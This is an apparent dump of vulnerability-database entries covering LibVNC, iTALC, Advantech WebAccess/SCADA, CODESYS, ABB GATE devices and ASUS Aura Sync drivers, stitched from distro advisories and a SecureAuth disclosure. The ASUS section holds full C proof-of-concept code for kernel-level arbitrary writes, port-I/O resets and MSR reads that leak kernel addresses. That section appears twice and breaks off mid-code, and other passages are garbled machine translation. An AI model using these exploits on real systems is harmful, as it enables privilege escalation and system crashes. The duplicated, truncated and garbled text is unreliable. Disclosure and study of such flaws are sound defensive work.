VARIoT IoT vulnerabilities database

LibVNC before commit a83439b9fbe0f03c48eb94ed05729cb016f8b72f contains multiple heap out-of-bound write vulnerabilities in VNC client code that can result remote code execution. LibVNC Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. LibVNCServer is prone to an multiple heap-based buffer-overflow vulnerabilities. Attackers can exploit these issues to execute arbitrary code within the context of the user running the affected application. Failed attempts will likely cause a denial-of-service condition. Versions prior to LibVNCServer 0.9.12 are vulnerable. For the stable distribution (stretch), these problems have been fixed in version 0.9.11+dfsg-1.3~deb9u1. We recommend that you upgrade your libvncserver packages. For the detailed security status of libvncserver please refer to its security tracker page at: https://security-tracker.debian.org/tracker/libvncserver Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlxXVEVfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0QnFA/+OdqSdVFFyBtT3WnOMUez7pBsk3wx0rzbCZ5uBJHYzr0ogMgDInL4GwdW RrTvSQtpKiUjmN4tfocXxKiWq6/KVZ5wgfYCeIjzzSr8qQHqYnV9NH2A8bUpVFAp M04zpV/zqPd2vlUPkppigHCyemV7sRuaXikGyUYm4Y6zBEhSg2vfyqfFmoggKoq8 aD6cWtKgCW3aSALA52JlVn5cPz17xvrk1zfStgtLPjHZTMHW19fDXq1hubxfR3q1 66LEfcs+13BFZW+09/eYSsC5vM96s4AfshErjtwpMxtVnc9MEIRNfRM9kfteaRvi s60EmM7xFvbx9acIQgKnLNNyjExzjySmgO0Bq7GNBu0gK1wNVpnOHI9EtBLfjOE7 YrYOxvwyTI5jFS0Txl846/dXwxy6gcX/bTlO6mqQFUicJcr7DU4GflHrt/t15VcK e7DBeWlhzV7yBoxC5yjS37dug0Ab9A9+TpCRxD5jwMWHZ3g+/8oXybCEqpuFwrqb kS1L4op0CHvouGbRldEtFookQud5deuqbEGxScGvOr8buENpnQmc6fzDh3jMH2wZ BNUHPzIYJHKqMXCK41jUB40/0v5iz5z5gHvRYfo8+ZOoLIFCp7zER3RDxwR8fGiK tqycmFiHaax09jHvqffRbwARfVrrrNbh4u/F7n3WWpbIsCjPOC4mI2 -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201908-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: LibVNCServer: Multiple vulnerabilities Date: August 09, 2019 Bugs: #659560, #673508 ID: 201908-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in LibVNCServer, the worst of which could result in the arbitrary execution of code. Background ========== LibVNCServer/LibVNCClient are cross-platform C libraries that allow you to easily implement VNC server or client functionality in your program. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/libvncserver < 0.9.12 >= 0.9.12 Description =========== Multiple vulnerabilities have been discovered in LibVNCServer. Please review the CVE identifiers referenced below for details. Impact ====== Please review the referenced CVE identifiers for details. Workaround ========== There is no known workaround at this time. Resolution ========== All LibVNCServer users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/libvncserver-0.9.12" References ========== [ 1 ] CVE-2018-20019 https://nvd.nist.gov/vuln/detail/CVE-2018-20019 [ 2 ] CVE-2018-20020 https://nvd.nist.gov/vuln/detail/CVE-2018-20020 [ 3 ] CVE-2018-20021 https://nvd.nist.gov/vuln/detail/CVE-2018-20021 [ 4 ] CVE-2018-20022 https://nvd.nist.gov/vuln/detail/CVE-2018-20022 [ 5 ] CVE-2018-20023 https://nvd.nist.gov/vuln/detail/CVE-2018-20023 [ 6 ] CVE-2018-20024 https://nvd.nist.gov/vuln/detail/CVE-2018-20024 [ 7 ] CVE-2018-7225 https://nvd.nist.gov/vuln/detail/CVE-2018-7225 [ 8 ] CVE-2018-7226 https://nvd.nist.gov/vuln/detail/CVE-2018-7226 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201908-05 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2019 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . ========================================================================= Ubuntu Security Notice USN-4587-1 October 20, 2020 italc vulnerabilities ========================================================================= A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 16.04 LTS Summary: Several security issues were fixed in iTALC. Software Description: - italc: didact tool which allows teachers to view and control computer labs Details: Nicolas Ruff discovered that iTALC had buffer overflows, divide-by-zero errors and didn't check malloc return values. (CVE-2016-9941, CVE-2016-9942) It was discovered that iTALC had an out-of-bounds write, multiple heap out-of-bounds writes, an infinite loop, improper initializations, and null pointer vulnerabilities. (CVE-2018-15127, CVE-2018-20019, CVE-2018-20020, CVE-2018-20021, CVE-2018-20022, CVE-2018-20023, CVE-2018-20024, CVE-2018-20748, CVE-2018-20749, CVE-2018-20750, CVE-2018-7225, CVE-2019-15681) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 16.04 LTS: italc-client 1:2.0.2+dfsg1-4ubuntu0.1 italc-master 1:2.0.2+dfsg1-4ubuntu0.1 libitalccore 1:2.0.2+dfsg1-4ubuntu0.1 In general, a standard system update will make all the necessary changes. References: https://usn.ubuntu.com/4587-1 CVE-2014-6051, CVE-2014-6052, CVE-2014-6053, CVE-2014-6054, CVE-2014-6055, CVE-2016-9941, CVE-2016-9942, CVE-2018-15127, CVE-2018-20019, CVE-2018-20020, CVE-2018-20021, CVE-2018-20022, CVE-2018-20023, CVE-2018-20024, CVE-2018-20748, CVE-2018-20749, CVE-2018-20750, CVE-2018-7225, CVE-2019-15681 Package Information: https://launchpad.net/ubuntu/+source/italc/1:2.0.2+dfsg1-4ubuntu0.1

WebAccess/SCADA, WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1. Lack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. WebAccess/SCADA Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA version 8.3.2 based on the Windows 2008 R2 SP1 platform that could allow an attacker to execute arbitrary code or cause a denial of service in the context of an affected application. Advantech WebAccess/SCADA is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely cause denial-of-service conditions. Advantech WebAccess/SCADA version 8.3.2 is vulnerable

Improper Communication Address Filtering exists in CODESYS V3 products versions prior V3.5.14.0. CODESYS V3 There are unspecified vulnerabilities in the product.Information may be obtained. 3S-Smart CODESYS Control for BeagleBone, etc. are all German 3S-Smart Software Solutions company's programming software for industrial control system development. A security vulnerability exists in several 3S-Smart Software Solutions products, which stems from programs that do not properly restrict communication channels. An attacker could use this vulnerability to impersonate the source of a communication packet. The following products are affected: 3S-Smart CODESYS Control for BeagleBone, CODESYS Control for emPC-A / iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (part of CODESYS Development System setup), CODESYS Control V3 Runtime System Toolkit, CODESYS V3 Embedded Target Visu Toolkit, CODESYS V3 Remote Target Visu Toolkit, CODESYS V3 Safety SIL2, CODESYS Gateway V3, CODESYS HMI V3, CODESYS OPC Server V3, CODESYS PLCHandler SDK, CODESYS V3 Development System, CODESYS V3 Simulation Runtime (part of CODESYS Development System). 3S-Smart Software CODESYS is prone to the following security vulnerabilities: 1. An insecure random number generator weakness 3. A spoofing vulnerability An attacker can exploit these vulnerabilities to bypass security restrictions and perform certain unauthorized actions and to insert and display spoofed content. Other attacks are also possible

Use of Insufficiently Random Values exists in CODESYS V3 products versions prior V3.5.14.0. CODESYS The product contains an insufficient random value usage vulnerability.Information may be obtained. 3S-Smart CODESYS Control for BeagleBone, etc. are all German 3S-Smart Software Solutions company's programming software for industrial control system development. A number of 3S-Smart Software Solutions products have security vulnerabilities that result from programs using values with insufficient randomness. An attacker could use this vulnerability to affect the confidentiality and integrity of the data. The following products are affected: 3S-Smart CODESYS Control for BeagleBone; CODESYS Control for emPC-A / iMX6; CODESYS Control for IOT2000; CODESYS Control for Linux; CODESYS Control for PFC100; CODESYS Control for PFC200; CODESYS Control for Raspberry Pi; CODESYS Control RTE V3; CODESYS Control RTE V3 (for Beckhoff CX); CODESYS Control Win V3 (part of CODESYS Development System setup); CODESYS Control V3 Runtime System Toolkit; CODESYS V3 Embedded Target Visu Toolkit; CODESYS V3 Remote Target Visu Toolkit; CODESYS V3 Safety SIL2; CODESYS Gateway V3; CODESYS HMI V3; CODESYS OPC Server V3; CODESYS PLCHandler SDK; CODESYS V3 Development System; CODESYS V3 Simulation Runtime (part of CODESYS Development System). 3S-Smart Software CODESYS is prone to the following security vulnerabilities: 1. An insecure random number generator weakness 3. A spoofing vulnerability An attacker can exploit these vulnerabilities to bypass security restrictions and perform certain unauthorized actions and to insert and display spoofed content. Other attacks are also possible

Pluto Safety PLC Gateway Ethernet devices ABB GATE-E1 and GATE-E2 all versions do not allow authentication to be configured on administrative telnet or web interfaces, which could enable various effects vectors, including conducting device resets, reading or modifying registers, and changing configuration settings such as IP addresses. ABB GATE-E1 and GATE-E2 Is vulnerable to a lack of authentication for critical functions.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ABB GATE-E2 is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability. Attackers can exploit these issues to execute arbitrary code in the context of the browser, obtain sensitive information; other attacks may also be possible. Both ABB GATE-E1 and GATE-E2 are Ethernet gateway devices of Swiss ABB Company. A security vulnerability exists in ABB GATE-E1 (EOL 2013) and GATE-E2 (EOL OCT 2018), which stems from the fact that the device does not allow authentication to be configured on the management telnet or web interface. An attacker could exploit this vulnerability to reset the device, read or modify the registry, and modify configuration settings such as the IP address

Pluto Safety PLC Gateway Ethernet devices in ABB GATE-E1 and GATE-E2 all versions allows an unauthenticated attacker using the administrative web interface to insert an HTML/Javascript payload into any of the device properties, which may allow an attacker to display/execute the payload in a visitor browser. ABB GATE-E1 and GATE-E2 Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ABBGATE-E1 and GATE-E2 are Ethernet gateway devices from ABB, Switzerland. A cross-site scripting vulnerability exists in ABBGATE-E1 (EOL2013) and GATE-E2 (EOLOCT2018) that can be exploited by remote attackers to inject HTML/Javascript payloads into arbitrary device properties and display them in the guest's browser. Execution load. Attackers can exploit these issues to execute arbitrary code in the context of the browser, obtain sensitive information; other attacks may also be possible

The Asusgio low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. ASUS Aura Sync Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions. ASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected. SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ ASUS Drivers Elevation of Privilege Vulnerabilities *1. *Advisory Information** Title: ASUS Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2017-0012 Advisory URL: http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities Date published: 2018-12-18 Date of last update: 2018-12-18 Vendors contacted: Asus Release mode: User release *2. *Vulnerability Information** Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535 *3. *Vulnerability Description** ASUS offers several drivers and utilities [1] in order to give the user more control over certain settings and functions of the motherboard. In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox, combining and controlling the LEDs of all your Aura-enabled products from a single application to achieve perfect, synchronized harmony. From motherboards and RGB strips to graphics cards and beyond, Aura Sync enables a veritable symphony of light for ultimate personalization. *4. *Vulnerable Packages** . *5. *Vendor Information, Solutions and Workarounds** The vendor did not provide fixes or workaround information. *6. *Credits** These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. *7. *Technical Description / Proof of Concept Code** Aura Sync is ASUS's command software for all their line of recent RGB lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc). The main subject of this advisory are two of the device drivers installed/loaded by the Aura Sync application. From now on addressed as "Asusgio" and "GLCKIo". Default installation allows non-privileged user processes (even running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to these drivers. The following sections describe the problems found. *7.1. *Arbitrary ring0 write** [CVE-2018-18537] There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050) on GLCKIo leading to write of arbitrary DWORD to an arbitrary address. /----- .text:FFFFF800B09F13FE loc_FFFFF800B09F13FE: .text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38] ; CONTROLLED VALUE .text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56] ; CONTROLLED VALUE .text:FFFFF800B09F140A mov [rax], ecx ; Arbitrary DWORD sized write! .text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp] .text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4 .text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D -----/ Proof of Concept: /----- #include <windows.h> HANDLE ghDriver = 0; #define IOCTL_GLCKIO_VMWRITE 0x80102050 typedef struct _STRUCT_GLCKIO_VMWRITE { WORD unk0; DWORD unk1_1; WORD unk1_2; ULONG64 unk2; ULONG64 unk3; ULONG64 unk4; ULONG64 unk5; ULONG64 unk6; } STRUCT_GLCKIO_VMWRITE; BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value) { STRUCT_GLCKIO_VMWRITE mystructIn = { 0 }; mystructIn.unk0 = 0xf11; mystructIn.unk1_1 = value; // value mystructIn.unk5 = dest; // address STRUCT_GLCKIO_VMWRITE mystructOut = { 0 }; DWORD returned = 0; DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut), &returned, NULL); return BOOL(returned); } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n"); if (!InitDriver()) { exit(0); } printf("press ENTER for instant BSOD\n"); getchar(); ArbitraryWriteDWORD(0, 0xffffffff); CloseHandle(ghDriver); return 0; } -----/ *7.2. *Port mapped I/O access** [CVE-2018-18536] Both GLCKIo and Asusgio expose a functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges. /----- // This harmless PoC only reboots the PC, much more sinister stuff // would also be possible by abusing this functionality. // Compile for 32bit!!! Asusgio apparently has a bug preventing this // functionality to work unless IoIs32bitProcess == TRUE. They set rdx // as a pointer instead of a port number on the in/out instruction... // and they ONLY do this incorrectly in the x64 process specific code.(!?) #include "stdafx.h" #include <windows.h> // for \\.\glckio #define IOCTL_GLCKIO_WRITEPORT 0x80102054 #define IOCTL_GLCKIO_READPORT 0x80102050 // for \\.\Asusgio #define IOCTL_ASIO_PORTREADB 0xA0406400 #define IOCTL_ASIO_PORTWRITEB 0xA040A440 HANDLE ghDriver = 0; typedef BYTE(*fnPMIOReadB)(WORD port); typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value); #pragma pack (push,1) typedef struct { DWORD DriverIndex; // DriverEnum index BYTE DeviceName[MAX_PATH]; fnPMIOReadB pPMIOReadB; fnPMIOWriteB pPMIOWriteB; } AutoConfigStruct; AutoConfigStruct gConfig = { 0 }; enum DriverEnum { ASIO = 1, GLCKIO, }; typedef struct _ASIO_PORTIO_STRUCT { DWORD port; ULONG64 value; } ASIO_PORTIO_STRUCT; typedef struct _GLCKIO_PORTIO_STRUCT { WORD port; DWORD value; DWORD datalen; } GLCKIO_PORTIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ BYTE outbuffer[0x30] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ BYTE GLCKIO_PMIOReadB(WORD port) { GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1}; IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10) } BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value) { GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 }; IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10) } BYTE ASIO_PMIOReadB(WORD port) { ASIO_PORTIO_STRUCT inbuffer = { port, 0 }; IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4) } BYTE ASIO_PMIOWriteB(WORD port, BYTE value) { ASIO_PORTIO_STRUCT inbuffer = { port, value }; IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5) } void Reboot() { BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6; gConfig.pPMIOWriteB(0xcf9, cf9 | 2); Sleep(50); gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe); Sleep(50); } BOOL InitDriver() { char *szDeviceNames[] = { "\\\\.\\Asusgio" , "\\\\.\\GLCKIo" }; BYTE i = 0; for (i = 0; i<2; i++) { ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError()); continue; } gConfig.DriverIndex = i+1; memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1); break; } switch (gConfig.DriverIndex) { case DriverEnum::ASIO: { gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB; gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB; } break; case DriverEnum::GLCKIO: { gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB; } gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB; break; default: break; } return gConfig.DriverIndex ? TRUE : FALSE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (PMIO access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver); printf("press ENTER for hard reset..."); getchar(); Reboot(); CloseHandle(ghDriver); } -----/ *7.3. Proof of Concept: /----- // This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR // register value (leaks a kernel function pointer bypassing KASLR) and // then writing garbage to it (instant BSOD!) #include <windows.h> // for \\.\Asusgio #define IOCTL_ASIO_RDMSR 0xA0406458 #define IOCTL_ASIO_WRMSR 0xA040A45C HANDLE ghDriver = 0; #pragma pack (push,1) typedef struct _ASIO_MSRIO_STRUCT { DWORD reg; ULONG64 value; } ASIO_MSRIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ ULONG64 outbuffer[2] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ ULONG64 ASIO_RDMSR(DWORD reg) { ASIO_MSRIO_STRUCT inbuffer = { reg }; IOCTLMACRO(IOCTL_ASIO_RDMSR, 4) } ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value) { ASIO_MSRIO_STRUCT inbuffer = { reg, value }; IOCTLMACRO(IOCTL_ASIO_WRMSR, 12) } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\Asusgio", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", "\\\\.\\Asusgio", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (MSR access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082); printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR); printf("press ENTER for instant BSOD\n"); getchar(); a = ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222); CloseHandle(ghDriver); } -----/ *8. *Report Timeline** 2017-11-27: SecureAuth sent an initial notification to ASUS, asking for GPG keys. 2017-12-14: SecureAuth sent a second notification to ASUS. 2018-01-29: SecureAuth sent a third notification to ASUS. 2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report with technical information. 2018-01-31: SecureAuth sent Asus a draft version of the advisory. 2018-02-07: SecureAuth requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-14: SecureAuth again requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-21: Asus acknowledged SecureAuth's draft report and asked for time for internal investigations. 2018-02-21: Asus answered saying that they were planning to update Aura in April. 2018-02-21: SecureAuth thanked Asus's feedback and requested a regular contact until the Auras update. 2018-03-19: SecureAuth asked for a status update. 2018-03-26: SecureAuth asked for a status update again. 2018-03-26: SecureAuth asked Asus to confirm if this new version had been already released. 2018-04-03: SecureAuth requested a status update. 2018-04-16: SecureAuth requested a confirmation for Asus. 2018-04-23: SecureAuth requested a confirmation for Asus again. However, this version didn't address the reported vulnerabilities. For that reason, SecureAuth requested a clarification about the case. In this context, SecureAuth requested a new clarification. 2018-07-03: SecureAuth requested a status update. 2018-12-18: Advisory CORE-2017-0012 published as 'user release'. *9. *References** [1] https://www.asus.com/support *10. *About SecureAuth Labs** SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning. Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com. *11. *About SecureAuth** SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, identity governance, and penetration testing, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible Identity Security Automation (ISA) platform makes it easier for organizations to prevent the misuse of credentials and exponentially reduce the enterprise threat surface. To learn more, visit www.secureauth.com, call (949) 777-6959, or email us at info@secureauth.com *12. *Disclaimer** The contents of this advisory are copyright (c) 2018 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

The GLCKIo and Asusgio low-level drivers in ASUS Aura Sync v1.07.22 and earlier expose functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges. ASUS Aura Sync Contains vulnerabilities in authorization, authority, and access control.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions. ASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected. SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ ASUS Drivers Elevation of Privilege Vulnerabilities *1. *Advisory Information** Title: ASUS Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2017-0012 Advisory URL: http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities Date published: 2018-12-18 Date of last update: 2018-12-18 Vendors contacted: Asus Release mode: User release *2. *Vulnerability Information** Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535 *3. *Vulnerability Description** ASUS offers several drivers and utilities [1] in order to give the user more control over certain settings and functions of the motherboard. In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox, combining and controlling the LEDs of all your Aura-enabled products from a single application to achieve perfect, synchronized harmony. From motherboards and RGB strips to graphics cards and beyond, Aura Sync enables a veritable symphony of light for ultimate personalization. *4. *Vulnerable Packages** . *5. *Vendor Information, Solutions and Workarounds** The vendor did not provide fixes or workaround information. *6. *Credits** These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. *7. *Technical Description / Proof of Concept Code** Aura Sync is ASUS's command software for all their line of recent RGB lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc). The main subject of this advisory are two of the device drivers installed/loaded by the Aura Sync application. From now on addressed as "Asusgio" and "GLCKIo". Default installation allows non-privileged user processes (even running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to these drivers. The following sections describe the problems found. *7.1. *Arbitrary ring0 write** [CVE-2018-18537] There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050) on GLCKIo leading to write of arbitrary DWORD to an arbitrary address. /----- .text:FFFFF800B09F13FE loc_FFFFF800B09F13FE: .text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38] ; CONTROLLED VALUE .text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56] ; CONTROLLED VALUE .text:FFFFF800B09F140A mov [rax], ecx ; Arbitrary DWORD sized write! .text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp] .text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4 .text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D -----/ Proof of Concept: /----- #include <windows.h> HANDLE ghDriver = 0; #define IOCTL_GLCKIO_VMWRITE 0x80102050 typedef struct _STRUCT_GLCKIO_VMWRITE { WORD unk0; DWORD unk1_1; WORD unk1_2; ULONG64 unk2; ULONG64 unk3; ULONG64 unk4; ULONG64 unk5; ULONG64 unk6; } STRUCT_GLCKIO_VMWRITE; BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value) { STRUCT_GLCKIO_VMWRITE mystructIn = { 0 }; mystructIn.unk0 = 0xf11; mystructIn.unk1_1 = value; // value mystructIn.unk5 = dest; // address STRUCT_GLCKIO_VMWRITE mystructOut = { 0 }; DWORD returned = 0; DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut), &returned, NULL); return BOOL(returned); } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n"); if (!InitDriver()) { exit(0); } printf("press ENTER for instant BSOD\n"); getchar(); ArbitraryWriteDWORD(0, 0xffffffff); CloseHandle(ghDriver); return 0; } -----/ *7.2. /----- // This harmless PoC only reboots the PC, much more sinister stuff // would also be possible by abusing this functionality. // Compile for 32bit!!! Asusgio apparently has a bug preventing this // functionality to work unless IoIs32bitProcess == TRUE. They set rdx // as a pointer instead of a port number on the in/out instruction... // and they ONLY do this incorrectly in the x64 process specific code.(!?) #include "stdafx.h" #include <windows.h> // for \\.\glckio #define IOCTL_GLCKIO_WRITEPORT 0x80102054 #define IOCTL_GLCKIO_READPORT 0x80102050 // for \\.\Asusgio #define 